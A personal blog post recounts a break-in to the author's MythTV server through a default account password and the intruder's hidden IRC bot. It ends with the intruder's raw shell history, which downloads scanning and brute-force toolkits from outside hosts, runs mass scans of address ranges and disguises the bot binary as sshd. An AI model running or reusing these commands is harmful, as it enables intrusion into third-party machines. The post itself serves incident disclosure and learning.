I woke up on the couch very early this morning, like around 4:30ish, after falling asleep trying to watch Kill Bill 1. I decided in my half-dazed state to check the disk space on one of my servers before going to bed, because it's been getting pretty close to full. I logged into the machine and typed
last. Up came a login by user
mythtv from a few days ago.
That's funny, because I sure didn't log in as mythtv any time recently, and I'm ostensibly the only one allowed to log into this machine.
mythtv was not logged in at that moment. But there was an sshd process running owned by mythtv. I checked the auth log, and sure enough, mythtv had logged in with a password. It was not in the middle of any other break-in attempts; just one successful login. It was probably because I, ahem, left the password at the default. I would not have done that intentionally, but I might have done it nonetheless.
So, long story short, someone got access to one of my machines for a few days. They didn't do anything to the machine, and I'm pretty certain after doing standard verification things that I was not rooted. They didn't send any mail out. They just ran an instance of EnergyMech, which they had renamed to
sshd, probably for the same reason that they installed all this stuff in
.... I admit I missed it the first time looking. The instance spawned 3 bots, who then logged into 3 different irc servers.
Since they didn't seem to be doing anything harmful, and because I was curious and wanted to learn from this incident, I ran
tethereal all day and recorded their traffic. I now have an awful lot of people's (or other bots'?)
undernet passwords, and some conversations in Romanian. I'm not sure yet what to do with this information. If any of you speak what they speak in Romania and would like to translate some log files, let me know.
I'll post some more details about this later. Some of you will find the
~/.bash_history file entertaining, so I'll include that here. I also killed and restarted the EnergyMech in debug mode, and logged that for a while.
The question remains how they knew right off the bat that I was running mythtv. I have three theories at the moment. One is that they could be combing freenode's #mythtv-users channel for IPs, because it is publicly logged, and I have been there before (although normally my IP is obscured by my cloak). Second is that there has been some kind of compromise that allows them to monitor connections to the servers that myth boxes talk to in order to fill their database with channel info. Third is that they just got really lucky, and got in on the first try with a list of default users and passwords. I suppose there is the fourth possibility that they doctored the logs and actually exploited something to get in, but it doesn't look like that to me.
Obviously I will comb the bot and traffic logs for IPs and try to notify people that their machines have been compromised. Anything else I should do?
You'll see that they did some port scanning too. I'm not sure yet what all these strangely named binaries do, other than scan. They probably ran some more cracking attempts on other machines. They tried to set up a PHP cgi-bin script that lets them execute shell commands.
Among the artifacts they left laying around are files of common passwords and usernames. But
mythtv does not appear in any of these files.
They also ran
mythtv-setup, which is downright bizarre. Maybe they were expecting X forwarding to be enabled (it's not). If that's the case, then that lends credibility to the theory that this is a mythtv-specific effort.
w passwd uname -a ls /etc/rc.d/init.d/httpd status /etc/rc.d/init.d/sendmail status php -v ps aux cd .X11-unix cd X11 cd /tmp/.X11-unix ls tar xzvf boti.tgz rm -rf boti.tgz cd mech mv mech httpd export PATH=:PATH httpd uname -a w mkdir public_html ls cd public_html /etc/rc.d/init.d/sendmail status /etc/rc.d/init.d/httpd status uname -a ps aux w mythtv-setup w w uname -a cd /tmp mkdir ... cd ... ftp 18.104.22.168 tar xzvf boti.tgz rm -rf boti.tgz cd mech mv mech httpd export PATH=:PATH httpd wget www.fpt.uv.ro/scan/rooteam.tar.gz cd /tmp wget www.fpt.uv.ro/scan/rooteam.tar.gz tar -zxvf rooteam.tar.gz cd rooteam chmod +x * ./auto mv unix assh chmod +x * ./211 w cd /tmp ls cd rooteam ls rm -rf 211 211.21.find.22 chmod +x * ./unix 24.16 ./assh 24.16 ./assh 24.17 ./assh 24.18 ./assh 24.19 ./assh 24.20 ./assh 24.21 ./assh 24.22 ./assh 24.23 ./assh 24.24 ./assh 24.25 ./assh 24.26 ./assh 24.27 ./assh 24.28 ./assh 24.29 ./assh 24.30 ./assh 24.31 ./assh 24.32 ./assh 24.33 ./assh 24.34 ./assh 24.35 ./assh 24.36 ./assh 24.37 ./assh 24.38 ./assh 24.39 ./assh 24.40 ./assh 24.41 ./assh 24.42 ./assh 24.43 ./assh 24.44 cd /tmp ls rm -rf rooteam rm -rf rooteam.tar.gz wget www.fpt.uv.ro/scan/ssteam2.tgz tar -zxvf ssteam2.tgz cd ssteam2 chmod +x * ./start 66.92 ls ./samba ls ./samba 200.3 ./o0o ./o0o 200 ./o0o 200.3 cd /tmp ls rm -rf ssteam2 ssteam2.tgz wget www.fpt.uv.ro/scan/madiceman.tgz tar -zxvf madiceman.tgz cd madiceman chmod +x * ./start 207.0 ./start 207.1 ./start 207.2 ./start 216.69 ./start 59.120 ./start 59.121 ./start 193.254 ./start 211.234 ./start 211.235 ./start 61.74 ./start 151.47 ./start 193.147 ./start 205.95 ./start 138.217 cd /tmp ls rm -rf madiceman madiceman.tgz cd /var/tmp ls wget www.mihai22.as.ro/prv8.tgz tar -xzvf prv8.tgz cd ssh ./scan 67,0 ./scan 67.0 ./scan 66.90 ./scan 216.130 ./scan 206.212 ./scan 200.118 ./scan 66.130 uname -a ps aux w cd /tmp ls wget franck.lydo.org/wtf.tar tar xvf wtf.tar cd wtf ./wtf 62.95 ./wtf 212.174 ./wtf 212.175 ./wtf 212.176 ./wtf 212.177 ./wtf 83.146 ./wtf 83.147 ./wtf 137.132 ./wtf 137.133 ./wtf 137.134 ./wtf 137.135 ./wtf 137.136 ./wtf 169.55 w uname -a ps aux passwd kill -9 29638 cd /tmp mkdir ... cd ... ls rm -rf mech wget www.ploiesti.cc/linux.tar.gz tar -zxvf linux.tar.gz cd http cd kids mv mech sshd chmod +x * PATH="." sshd cd /tmp wget www.ploiesti.cc/gov.tar tar xvf gov.tar rm -rf gov.tar cd gov chmod +x * cat /proc/cpuinfo ./gov 61.150 ./gov 61.151 ./gov 61.152 ./gov 61.153 ./gov 61.154 ./gov 61.155